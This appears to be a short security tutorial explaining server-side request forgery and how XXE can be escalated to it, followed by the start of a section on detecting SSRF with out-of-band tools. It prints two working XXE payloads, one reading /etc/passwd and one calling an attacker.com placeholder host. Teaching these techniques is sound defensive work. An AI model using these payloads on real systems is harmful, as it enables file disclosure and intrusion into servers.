SSRF- Server Side Request Forgery is a technique used for subverting the application logic from intended functionality of fetching contents from other sources to loading attacker supplied targets. RFI and SSRF are very much similar only difference is in RFI there is code execution but in SSRF code execution may not be there. Implictions of SSRF are endless from scanning internal network to RCE and chaining with other issues can have a huge impact e.g XXE can be escalated to SSRF by using http:// in place of file:// in the payload below.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>
Detecting SSRF-
a) Using burp collaborator or project discovery’s interactsh-
Note: In this case server do not has access to internet, so we will be using interactsh. In real scenario I usually use collaborator.
If we get only dns interaction in any of these tools. There is a possibility that http is blocked. in that case we can try using other protocols like gopher.
Other online collaborator like services-
